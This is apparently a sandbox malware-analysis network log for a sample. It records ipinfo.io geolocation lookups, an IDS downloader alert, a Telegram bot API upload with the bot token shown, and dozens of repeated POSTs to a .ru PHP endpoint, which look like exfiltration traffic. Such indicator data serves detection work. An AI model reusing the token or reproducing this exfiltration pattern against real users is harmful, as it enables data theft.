Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: POST /bot7756238957:AAHvV3zk_7YEKqo4UEP1y3YWBMYahxxWzGM/sendPhoto HTTP/1.1 | Content-Type: multipart/form-data; boundary="e71f89a2-fcb0-4187-b628-838104fb7f43" | Host: api.telegram.org | Content-Length: 96406 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 34.117.59.81
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipinfo.io
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49709 -> 34.117.59.81:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49694 -> 34.117.59.81:443
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 2536 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 2052 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 2536 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 2536 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 153784 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 009383cm.nyashk.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2032Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2052Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /geoProcessorGameprotectSqllinuxwindowsdatalifeprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 009383cm.nyashk.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
